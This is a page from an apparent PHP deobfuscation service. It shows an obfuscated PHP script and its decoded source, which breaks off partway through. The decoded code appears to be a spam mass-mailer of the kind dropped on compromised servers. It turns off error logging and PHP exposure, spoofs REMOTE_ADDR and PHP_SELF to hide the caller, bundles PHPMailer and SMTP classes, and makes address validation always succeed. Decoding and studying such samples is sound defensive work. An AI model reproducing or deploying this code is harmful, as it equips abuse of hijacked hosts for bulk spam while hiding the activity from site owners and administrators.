Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $cDRUH='a';$g='z';$wOxb='o';$Nvc='g';$Bkor='6';$fkZH='d';$c='n';$q='l';$GRm='i';$m='..
Decoded Output download
?><?php
@ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('mail.add_x_header', 0); @ini_set('expose_php',0); @ini_set('mail.add_x_header', 'off'); @ini_set('expose_php','off'); @ini_set('error_reporting', 0); @ini_set('display_errors', 0); $oldphpself = $_SERVER['PHP_SELF']; $oldremoteaddr = $_SERVER['REMOTE_ADDR']; $_SERVER['PHP_SELF'] = "/"; $_SERVER['REMOTE_ADDR'] = $_SERVER['SERVER_ADDR']; class SMTP { public $SMTP_PORT = 25; public $CRLF = "
"; public $do_debug; public $Debugoutput = "echo"; public $do_verp = false; public $Timeout = 15; public $Timelimit = 30; public $Version = '5.2.2'; private $smtp_conn; private $error; private $helo_rply; private function edebug($str) { if ($this->Debugoutput == "error_log") { error_log($str); } else { echo $str; } } public function __construct() { $this->smtp_conn = 0; $this->error = null; $this->helo_rply = null; $this->do_debug = 0; } public function Connect($host, $port = 0, $tval = 30) { $this->error = null; if($this->connected()) { $this->error = array("error" => "Already connected to a server"); return false; } if(empty($port)) { $port = $this->SMTP_PORT; } echo "$host
"; $this->smtp_conn = @fsockopen($host, $port, $errno, $errstr, $tval); if(empty($this->smtp_conn)) { $this->error = array("error" => "Failed to connect to server", "errno" => $errno, "errstr" => $errstr); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": $errstr ($errno)" . $this->CRLF . '<br />'); } return false; } if(substr(PHP_OS, 0, 3) != "WIN") { $max = ini_get('max_execution_time'); if ($max != 0 && $tval > $max) { @set_time_limit($tval); } stream_set_timeout($this->smtp_conn, $tval, 0); } $announce = $this->get_lines(); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $announce . $this->CRLF . '<br />'); } return true; } public function StartTLS() { $this->error = null; if(!$this->connected()) { $this->error = array("error" => "Called StartTLS() without being connected"); return false; } fputs($this->smtp_conn,"STARTTLS" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if($code != 220) { $this->error = array("error" => "STARTTLS not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } if(!stream_socket_enable_crypto($this->smtp_conn, true, STREAM_CRYPTO_METHOD_TLS_CLIENT)) { return false; } return true; } public function Authenticate($username, $password, $authtype='LOGIN', $realm='', $workstation='') { if (empty($authtype)) { $authtype = 'LOGIN'; } switch ($authtype) { case 'PLAIN': fputs($this->smtp_conn,"AUTH PLAIN" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($code != 334) { $this->error = array("error" => "AUTH not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } fputs($this->smtp_conn, base64_encode("".$username."".$password) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($code != 235) { $this->error = array("error" => "Authentication not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } break; case 'LOGIN': fputs($this->smtp_conn,"AUTH LOGIN" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($code != 334) { $this->error = array("error" => "AUTH not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } fputs($this->smtp_conn, base64_encode($username) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($code != 334) { $this->error = array("error" => "Username not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } fputs($this->smtp_conn, base64_encode($password) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($code != 235) { $this->error = array("error" => "Password not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } break; case 'NTLM': require_once('ntlm_sasl_client.php'); $temp = new stdClass(); $ntlm_client = new ntlm_sasl_client_class; if(! $ntlm_client->Initialize($temp)){ $this->error = array("error" => $temp->error); if($this->do_debug >= 1) { $this->edebug("You need to enable some modules in your php.ini file: " . $this->error["error"] . $this->CRLF); } return false; } $msg1 = $ntlm_client->TypeMsg1($realm, $workstation); fputs($this->smtp_conn,"AUTH NTLM " . base64_encode($msg1) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($code != 334) { $this->error = array("error" => "AUTH not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF); } return false; } $challange = substr($rply,3); $challange = base64_decode($challange); $ntlm_res = $ntlm_client->NTLMResponse(substr($challange,24,8),$password); $msg3 = $ntlm_client->TypeMsg3($ntlm_res,$username,$realm,$workstation); fputs($this->smtp_conn, base64_encode($msg3) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($code != 235) { $this->error = array("error" => "Could not authenticate", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF); } return false; } break; } return true; } public function Connected() { if(!empty($this->smtp_conn)) { $sock_status = socket_get_status($this->smtp_conn); if($sock_status["eof"]) { if($this->do_debug >= 1) { $this->edebug("SMTP -> NOTICE:" . $this->CRLF . "EOF caught while checking if connected"); } $this->Close(); return false; } return true; } return false; } public function Close() { $this->error = null; $this->helo_rply = null; if(!empty($this->smtp_conn)) { fclose($this->smtp_conn); $this->smtp_conn = 0; } } public function Data($msg_data) { $this->error = null; if(!$this->connected()) { $this->error = array( "error" => "Called Data() without being connected"); return false; } fputs($this->smtp_conn,"DATA" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if($code != 354) { $this->error = array("error" => "DATA command not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } $msg_data = str_replace("
","
",$msg_data); $msg_data = str_replace("
","
",$msg_data); $lines = explode("
",$msg_data); $field = substr($lines[0],0,strpos($lines[0],":")); $in_headers = false; if(!empty($field) && !strstr($field," ")) { $in_headers = true; } $max_line_length = 998; while(list(,$line) = @each($lines)) { $lines_out = null; if($line == "" && $in_headers) { $in_headers = false; } while(strlen($line) > $max_line_length) { $pos = strrpos(substr($line,0,$max_line_length)," "); if(!$pos) { $pos = $max_line_length - 1; $lines_out[] = substr($line,0,$pos); $line = substr($line,$pos); } else { $lines_out[] = substr($line,0,$pos); $line = substr($line,$pos + 1); } if($in_headers) { $line = " " . $line; } } $lines_out[] = $line; while(list(,$line_out) = @each($lines_out)) { if(strlen($line_out) > 0) { if(substr($line_out, 0, 1) == ".") { $line_out = "." . $line_out; } } fputs($this->smtp_conn,$line_out . $this->CRLF); } } fputs($this->smtp_conn, $this->CRLF . "." . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if($code != 250) { $this->error = array("error" => "DATA not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function Hello($host = '') { $this->error = null; if(!$this->connected()) { $this->error = array( "error" => "Called Hello() without being connected"); return false; } if(empty($host)) { $host = "localhost"; } if(!$this->SendHello("EHLO", $host)) { if(!$this->SendHello("HELO", $host)) { return false; } } return true; } private function SendHello($hello, $host) { fputs($this->smtp_conn, $hello . " " . $host . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER: " . $rply . $this->CRLF . '<br />'); } if($code != 250) { $this->error = array("error" => $hello . " not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } $this->helo_rply = $rply; return true; } public function Mail($from) { $this->error = null; if(!$this->connected()) { $this->error = array( "error" => "Called Mail() without being connected"); return false; } $useVerp = ($this->do_verp ? " XVERP" : ""); fputs($this->smtp_conn,"MAIL FROM:<" . $from . ">" . $useVerp . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if($code != 250) { $this->error = array("error" => "MAIL not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function Quit($close_on_error = true) { $this->error = null; if(!$this->connected()) { $this->error = array( "error" => "Called Quit() without being connected"); return false; } fputs($this->smtp_conn,"quit" . $this->CRLF); $byemsg = $this->get_lines(); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $byemsg . $this->CRLF . '<br />'); } $rval = true; $e = null; $code = substr($byemsg,0,3); if($code != 221) { $e = array("error" => "SMTP server rejected quit command", "smtp_code" => $code, "smtp_rply" => substr($byemsg,4)); $rval = false; if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $e["error"] . ": " . $byemsg . $this->CRLF . '<br />'); } } if(empty($e) || $close_on_error) { $this->Close(); } return $rval; } public function Recipient($to) { $this->error = null; if(!$this->connected()) { $this->error = array( "error" => "Called Recipient() without being connected"); return false; } fputs($this->smtp_conn,"RCPT TO:<" . $to . ">" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if($code != 250 && $code != 251) { $this->error = array("error" => "RCPT not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function Reset() { $this->error = null; if(!$this->connected()) { $this->error = array( "error" => "Called Reset() without being connected"); return false; } fputs($this->smtp_conn,"RSET" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if($code != 250) { $this->error = array("error" => "RSET failed", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function SendAndMail($from) { $this->error = null; if(!$this->connected()) { $this->error = array( "error" => "Called SendAndMail() without being connected"); return false; } fputs($this->smtp_conn,"SAML FROM:" . $from . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply,0,3); if($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if($code != 250) { $this->error = array("error" => "SAML not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply,4)); if($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function Turn() { $this->error = array("error" => "This method, TURN, of the SMTP ". "is not implemented"); if($this->do_debug >= 1) { $this->edebug("SMTP -> NOTICE: " . $this->error["error"] . $this->CRLF . '<br />'); } return false; } public function getError() { return $this->error; } private function get_lines() { $data = ""; $endtime = 0; if (!is_resource($this->smtp_conn)) { return $data; } stream_set_timeout($this->smtp_conn, $this->Timeout); if ($this->Timelimit > 0) { $endtime = time() + $this->Timelimit; } while(is_resource($this->smtp_conn) && !feof($this->smtp_conn)) { $str = @fgets($this->smtp_conn,515); if($this->do_debug >= 4) { $this->edebug("SMTP -> get_lines(): \$data was \"$data\"" . $this->CRLF . '<br />'); $this->edebug("SMTP -> get_lines(): \$str is \"$str\"" . $this->CRLF . '<br />'); } $data .= $str; if($this->do_debug >= 4) { $this->edebug("SMTP -> get_lines(): \$data is \"$data\"" . $this->CRLF . '<br />'); } if(substr($str,3,1) == " ") { break; } $info = stream_get_meta_data($this->smtp_conn); if ($info['timed_out']) { if($this->do_debug >= 4) { $this->edebug("SMTP -> get_lines(): timed-out (" . $this->Timeout . " seconds) <br />"); } break; } if ($endtime) { if (time() > $endtime) { if($this->do_debug >= 4) { $this->edebug("SMTP -> get_lines(): timelimit reached (" . $this->Timelimit . " seconds) <br />"); } break; } } } return $data; } } class PHPMailer { public $CharSet = 'iso-8859-1'; public $ContentType = 'text/plain'; public $Encoding = '8bit'; public $ErrorInfo = ''; public $From = 'root@localhost'; public $FromName = 'Root User'; public $Sender = ''; public $ReturnPath = ''; public $Subject = ''; public $Body = ''; public $AltBody = ''; protected $MIMEBody = ''; protected $MIMEHeader = ''; protected $mailHeader = ''; public $WordWrap = 0; public $Mailer = 'mail'; public $Sendmail = '/usr/sbin/sendmail'; public $UseSendmailOptions = true; public $PluginDir = ''; public $ConfirmReadingTo = ''; public $Hostname = ''; public $MessageID = ''; public $MessageDate = ''; public $Host = 'localhost'; public $Port = 25; public $Helo = ''; public $SMTPSecure = ''; public $SMTPAuth = false; public $Username = ''; public $Password = ''; public $AuthType = ''; public $Realm = ''; public $Workstation = ''; public $Timeout = 15; public $SMTPDebug = false; public $Debugoutput = "echo"; public $SMTPKeepAlive = false; public $SingleTo = false; public $SingleToArray = array(); public $LE = "
"; public $DKIM_selector = ''; public $DKIM_identity = ''; public $DKIM_passphrase = ''; public $DKIM_domain = ''; public $DKIM_private = ''; public $action_function = ''; public $Version = '5.2.2'; public $XMailer = ''; protected $smtp = null; protected $to = array(); protected $cc = array(); protected $bcc = array(); protected $ReplyTo = array(); protected $all_recipients = array(); protected $attachment = array(); protected $CustomHeader = array(); protected $message_type = ''; protected $boundary = array(); protected $language = array(); protected $error_count = 0; protected $sign_cert_file = ''; protected $sign_key_file = ''; protected $sign_key_pass = ''; protected $exceptions = false; const STOP_MESSAGE = 0; const STOP_CONTINUE = 1; const STOP_CRITICAL = 2; const CRLF = "
"; private function mail_passthru($to, $subject, $body, $header, $params) { if ( ini_get('safe_mode') || !($this->UseSendmailOptions) ) { $rt = @mail($to, $this->EncodeHeader($this->SecureHeader($subject)), $body, $header); } else { $rt = @mail($to, $this->EncodeHeader($this->SecureHeader($subject)), $body, $header, $params); } return $rt; } private function edebug($str) { if ($this->Debugoutput == "error_log") { error_log($str); } else { echo $str; } } public function __construct($exceptions = false) { $this->exceptions = ($exceptions == true); } public function IsHTML($ishtml = true) { if ($ishtml) { $this->ContentType = 'text/html'; } else { $this->ContentType = 'text/plain'; } } public function IsSMTP() { $this->Mailer = 'smtp'; } public function IsMail() { $this->Mailer = 'mail'; } public function IsSendmail() { if (!stristr(ini_get('sendmail_path'), 'sendmail')) { $this->Sendmail = '/var/qmail/bin/sendmail'; } $this->Mailer = 'sendmail'; } public function IsQmail() { if (stristr(ini_get('sendmail_path'), 'qmail')) { $this->Sendmail = '/var/qmail/bin/sendmail'; } $this->Mailer = 'sendmail'; } public function AddAddress($address, $name = '') { return $this->AddAnAddress('to', $address, $name); } public function AddCC($address, $name = '') { return $this->AddAnAddress('cc', $address, $name); } public function AddBCC($address, $name = '') { return $this->AddAnAddress('bcc', $address, $name); } public function AddReplyTo($address, $name = '') { return $this->AddAnAddress('Reply-To', $address, $name); } protected function AddAnAddress($kind, $address, $name = '') { if (!preg_match('/^(to|cc|bcc|Reply-To)$/', $kind)) { $this->SetError($this->Lang('Invalid recipient array').': '.$kind); if ($this->exceptions) { throw new phpmailerException('Invalid recipient array: ' . $kind); } if ($this->SMTPDebug) { $this->edebug($this->Lang('Invalid recipient array').': '.$kind); } return false; } $address = trim($address); $name = trim(preg_replace('/[
]+/', '', $name)); if (!$this->ValidateAddress($address)) { $this->SetError($this->Lang('invalid_address').': '. $address); if ($this->exceptions) { throw new phpmailerException($this->Lang('invalid_address').': '.$address); } if ($this->SMTPDebug) { $this->edebug($this->Lang('invalid_address').': '.$address); } return false; } if ($kind != 'Reply-To') { if (!isset($this->all_recipients[strtolower($address)])) { array_push($this->$kind, array($address, $name)); $this->all_recipients[strtolower($address)] = true; return true; } } else { if (!array_key_exists(strtolower($address), $this->ReplyTo)) { $this->ReplyTo[strtolower($address)] = array($address, $name); return true; } } return false; } public function SetFrom($address, $name = '', $auto = 1) { $address = trim($address); $name = trim(preg_replace('/[
]+/', '', $name)); if (!$this->ValidateAddress($address)) { $this->SetError($this->Lang('invalid_address').': '. $address); if ($this->exceptions) { throw new phpmailerException($this->Lang('invalid_address').': '.$address); } if ($this->SMTPDebug) { $this->edebug($this->Lang('invalid_address').': '.$address); } return false; } $this->From = $address; $this->FromName = $name; if ($auto) { if (empty($this->ReplyTo)) { $this->AddAnAddress('Reply-To', $address, $name); } if (empty($this->Sender)) { $this->Sender = $address; } } return true; } public static function ValidateAddress($address) { return true; } public function Send() { try { if(!$this->PreSend()) return false; return $this->PostSend(); } catch (phpmailerException $e) { $this->mailHeader = ''; $this->SetError($e->getMessage()); if ($this->exceptions) { throw $e; } return false; } } public function PreSend() { try { $this->mailHeader = ""; if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) { throw new phpmailerException($this->Lang('provide_address'), self::STOP_CRITICAL); } if(!empty($this->AltBody)) { $this->ContentType = 'multipart/alternative'; } $this->error_count = 0; $this->SetMessageType(); if (empty($this->Body)) { throw new phpmailerException($this->Lang('empty_message'), self::STOP_CRITICAL); } $this->MIMEHeader = $this->CreateHeader(); $this->MIMEBody = $this->CreateBody(); if ($this->Mailer == 'mail') { if (count($this->to) > 0) { $this->mailHeader .= $this->AddrAppend("To", $this->to); } else { $this->mailHeader .= $this->HeaderLine("To", "undisclosed-recipients:;"); } $this->mailHeader .= $this->HeaderLine('Subject', $this->EncodeHeader($this->SecureHeader(trim($this->Subject)))); } if (!empty($this->DKIM_domain) && !empty($this->DKIM_private) && !empty($this->DKIM_selector) && !empty($this->DKIM_domain) && file_exists($this->DKIM_private)) { $header_dkim = $this->DKIM_Add($this->MIMEHeader, $this->EncodeHeader($this->SecureHeader($this->Subject)), $this->MIMEBody); $this->MIMEHeader = str_replace("
", "
", $header_dkim) . $this->MIMEHeader; } return true; } catch (phpmailerException $e) { $this->SetError($e->getMessage()); if ($this->exceptions) { throw $e; } return false; } } public function PostSend() { try { switch($this->Mailer) { case 'sendmail': return $this->SendmailSend($this->MIMEHeader, $this->MIMEBody); case 'smtp': return $this->SmtpSend($this->MIMEHeader, $this->MIMEBody); case 'mail': return $this->MailSend($this->MIMEHeader, $this->MIMEBody); default: return $this->MailSend($this->MIMEHeader, $this->MIMEBody); } } catch (phpmailerException $e) { $this->SetError($e->getMessage()); if ($this->exceptions) { throw $e; } if ($this->SMTPDebug) { $this->edebug($e->getMessage()."
"); } } return false; } protected function SendmailSend($header, $body) { if ($this->Sender != '') { $sendmail = sprintf("%s -oi -f%s -t", escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender)); } else { $sendmail = sprintf("%s -oi -t", escapeshellcmd($this->Sendmail)); } if ($this->SingleTo === true) { foreach ($this->SingleToArray as $val) { if(!@$mail = popen($sendmail, 'w')) { throw new phpmailerException($this->Lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fputs($mail, "To: " . $val . "
"); fputs($mail, $header); fputs($mail, $body); $result = pclose($mail); $isSent = ($result == 0) ? 1 : 0; $this->doCallback($isSent, $val, $this->cc, $this->bcc, $this->Subject, $body); if($result != 0) { throw new phpmailerException($this->Lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } } else { if(!@$mail = popen($sendmail, 'w')) { throw new phpmailerException($this->Lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fputs($mail, $header); fputs($mail, $body); $result = pclose($mail); $isSent = ($result == 0) ? 1 : 0; $this->doCallback($isSent, $this->to, $this->cc, $this->bcc, $this->Subject, $body); if($result != 0) { throw new phpmailerException($this->Lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } return true; } protected function MailSend($header, $body) { $toArr = array(); foreach($this->to as $t) { $toArr[] = $this->AddrFormat($t); } $to = implode(', ', $toArr); if (empty($this->Sender)) { $params = "-oi "; } else { $params = sprintf("-oi -f%s", $this->Sender); } if ($this->Sender != '' and !ini_get('safe_mode')) { $old_from = ini_get('sendmail_from'); @ini_set('sendmail_from', $this->Sender); } $rt = false; if ($this->SingleTo === true && count($toArr) > 1) { foreach ($toArr as $val) { $rt = $this->mail_passthru($val, $this->Subject, $body, $header, $params); $isSent = ($rt == 1) ? 1 : 0; $this->doCallback($isSent, $val, $this->cc, $this->bcc, $this->Subject, $body); } } else { $rt = $this->mail_passthru($to, $this->Subject, $body, $header, $params); $isSent = ($rt == 1) ? 1 : 0; $this->doCallback($isSent, $to, $this->cc, $this->bcc, $this->Subject, $body); } if (isset($old_from)) { @ini_set('sendmail_from', $old_from); } if(!$rt) { throw new phpmailerException($this->Lang('instantiate'), self::STOP_CRITICAL); } return true; } protected function SmtpSend($header, $body) { $bad_rcpt = array(); if(!$this->SmtpConnect()) { throw new phpmailerException($this->Lang('smtp_connect_failed'), self::STOP_CRITICAL); } $smtp_from = ($this->Sender == '') ? $this->From : $this->Sender; if(!$this->smtp->Mail($smtp_from)) { throw new phpmailerException($this->Lang('from_failed') . $smtp_from, self::STOP_CRITICAL); } foreach($this->to as $to) { if (!$this->smtp->Recipient($to[0])) { $bad_rcpt[] = $to[0]; $isSent = 0; $this->doCallback($isSent, $to[0], '', '', $this->Subject, $body); } else { $isSent = 1; $this->doCallback($isSent, $to[0], '', '', $this->Subject, $body); } } foreach($this->cc as $cc) { if (!$this->smtp->Recipient($cc[0])) { $bad_rcpt[] = $cc[0]; $isSent = 0; $this->doCallback($isSent, '', $cc[0], '', $this->Subject, $body); } else { $isSent = 1; $this->doCallback($isSent, '', $cc[0], '', $this->Subject, $body); } } foreach($this->bcc as $bcc) { if (!$this->smtp->Recipient($bcc[0])) { $bad_rcpt[] = $bcc[0]; $isSent = 0; $this->doCallback($isSent, '', '', $bcc[0], $this->Subject, $body); } else { $isSent = 1; $this->doCallback($isSent, '', '', $bcc[0], $this->Subject, $body); } } if (count($bad_rcpt) > 0 ) { $badaddresses = implode(', ', $bad_rcpt); throw new phpmailerException($this->Lang('recipients_failed') . $badaddresses); } if(!$this->smtp->Data($header . $body)) { throw new phpmailerException($this->Lang('data_not_accepted'), self::STOP_CRITICAL); } if($this->SMTPKeepAlive == true) { $this->smtp->Reset(); } else { $this->smtp->Quit(); $this->smtp->Close(); } return true; } public function SmtpConnect() { if(is_null($this->smtp)) { $this->smtp = new SMTP; } $this->smtp->Timeout = $this->Timeout; $this->smtp->do_debug = $this->SMTPDebug; $hosts = explode(';', $this->Host); $index = 0; $connection = $this->smtp->Connected(); try { while($index < count($hosts) && !$connection) { $hostinfo = array(); if (preg_match('/^(.+):([0-9]+)$/', $hosts[$index], $hostinfo)) { $host = $hostinfo[1]; $port = $hostinfo[2]; } else { $host = $hosts[$index]; $port = $this->Port; } $tls = ($this->SMTPSecure == 'tls'); $ssl = ($this->SMTPSecure == 'ssl'); if ($this->smtp->Connect(($ssl ? 'ssl://':'').$host, $port, $this->Timeout)) { $hello = ($this->Helo != '' ? $this->Helo : $this->ServerHostname()); $this->smtp->Hello($hello); if ($tls) { if (!$this->smtp->StartTLS()) { throw new phpmailerException($this->Lang('tls')); } $this->smtp->Hello($hello); } $connection = true; if ($this->SMTPAuth) { if (!$this->smtp->Authenticate($this->Username, $this->Password, $this->AuthType, $this->Realm, $this->Workstation)) { throw new phpmailerException($this->Lang('authenticate')); } } } $index++; if (!$connection) { throw new phpmailerException($this->Lang('connect_host')); } } } catch (phpmailerException $e) { $this->smtp->Reset(); if ($this->exceptions) { throw $e; } } return true; } public function SmtpClose() { if ($this->smtp !== null) { if($this->smtp->Connected()) { $this->smtp->Quit(); $this->smtp->Close(); } } } function SetLanguage($langcode = 'en', $lang_path = 'language/') { $PHPMAILER_LANG = array( 'authenticate' => 'SMTP Error: Could not authenticate.', 'connect_host' => 'SMTP Error: Could not connect to SMTP host.', 'data_not_accepted' => 'SMTP Error: Data not accepted.', 'empty_message' => 'Message body empty', 'encoding' => 'Unknown encoding: ', 'execute' => 'Could not execute: ', 'file_access' => 'Could not access file: ', 'file_open' => 'File Error: Could not open file: ', 'from_failed' => 'The following From address failed: ', 'instantiate' => 'Could not instantiate mail function.', 'invalid_address' => 'Invalid address', 'mailer_not_supported' => ' mailer is not supported.', 'provide_address' => 'You must provide at least one recipient email address.', 'recipients_failed' => 'SMTP Error: The following recipients failed: ', 'signing' => 'Signing Error: ', 'smtp_connect_failed' => 'SMTP Connect() failed.', 'smtp_error' => 'SMTP server error: ', 'variable_set' => 'Cannot set or reset variable: ' ); $l = true; if ($langcode != 'en') { $l = @include $lang_path.'phpmailer.lang-'.$langcode.'.php'; } $this->language = $PHPMAILER_LANG; return ($l == true); } public function GetTranslations() { return $this->language; } public function AddrAppend($type, $addr) { $addr_str = $type . ': '; $addresses = array(); foreach ($addr as $a) { $addresses[] = $this->AddrFormat($a); } $addr_str .= implode(', ', $addresses); $addr_str .= $this->LE; return $addr_str; } public function AddrFormat($addr) { if (empty($addr[1])) { return $this->SecureHeader($addr[0]); } else { return $this->EncodeHeader($this->SecureHeader($addr[1]), 'phrase') . " <" . $this->SecureHeader($addr[0]) . ">"; } } public function WrapText($message, $length, $qp_mode = false) { $soft_break = ($qp_mode) ? sprintf(" =%s", $this->LE) : $this->LE; $is_utf8 = (strtolower($this->CharSet) == "utf-8"); $lelen = strlen($this->LE); $crlflen = strlen(self::CRLF); $message = $this->FixEOL($message); if (substr($message, -$lelen) == $this->LE) { $message = substr($message, 0, -$lelen); } $line = explode($this->LE, $message); $message = ''; for ($i = 0 ;$i < count($line); $i++) { $line_part = explode(' ', $line[$i]); $buf = ''; for ($e = 0; $e<count($line_part); $e++) { $word = $line_part[$e]; if ($qp_mode and (strlen($word) > $length)) { $space_left = $length - strlen($buf) - $crlflen; if ($e != 0) { if ($space_left > 20) { $len = $space_left; if ($is_utf8) { $len = $this->UTF8CharBoundary($word, $len); } elseif (substr($word, $len - 1, 1) == "=") { $len--; } elseif (substr($word, $len - 2, 1) == "=") { $len -= 2; } $part = substr($word, 0, $len); $word = substr($word, $len); $buf .= ' ' . $part; $message .= $buf . sprintf("=%s", self::CRLF); } else { $message .= $buf . $soft_break; } $buf = ''; } while (strlen($word) > 0) { $len = $length; if ($is_utf8) { $len = $this->UTF8CharBoundary($word, $len); } elseif (substr($word, $len - 1, 1) == "=") { $len--; } elseif (substr($word, $len - 2, 1) == "=") { $len -= 2; } $part = substr($word, 0, $len); $word = substr($word, $len); if (strlen($word) > 0) { $message .= $part . sprintf("=%s", self::CRLF); } else { $buf = $part; } } } else { $buf_o = $buf; $buf .= ($e == 0) ? $word : (' ' . $word); if (strlen($buf) > $length and $buf_o != '') { $message .= $buf_o . $soft_break; $buf = $word; } } } $message .= $buf . self::CRLF; } return $message; } public function UTF8CharBoundary($encodedText, $maxLength) { $foundSplitPos = false; $lookBack = 3; while (!$foundSplitPos) { $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack); $encodedCharPos = strpos($lastChunk, "="); if ($encodedCharPos !== false) { $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2); $dec = hexdec($hex); if ($dec < 128) { $maxLength = ($encodedCharPos == 0) ? $maxLength : $maxLength - ($lookBack - $encodedCharPos); $foundSplitPos = true; } elseif ($dec >= 192) { $maxLength = $maxLength - ($lookBack - $encodedCharPos); $foundSplitPos = true; } elseif ($dec < 192) { $lookBack += 3; } } else { $foundSplitPos = true; } } return $maxLength; } public function SetWordWrap() { if($this->WordWrap < 1) { return; } switch($this->message_type) { case 'alt': case 'alt_inline': case 'alt_attach': case 'alt_inline_attach': $this->AltBody = $this->WrapText($this->AltBody, $this->WordWrap); break; default: $this->Body = $this->WrapText($this->Body, $this->WordWrap); break; } } public function CreateHeader() { $result = ''; $uniq_id = md5(uniqid(time())); $this->boundary[1] = 'b1_' . $uniq_id; $this->boundary[2] = 'b2_' . $uniq_id; $this->boundary[3] = 'b3_' . $uniq_id; if ($this->MessageDate == '') { $result .= $this->HeaderLine('Date', self::RFCDate()); } else { $result .= $this->HeaderLine('Date', $this->MessageDate); } if ($this->ReturnPath) { $result .= $this->HeaderLine('Return-Path', trim($this->ReturnPath)); } elseif ($this->Sender == '') { $result .= $this->HeaderLine('Return-Path', trim($this->From)); } else { 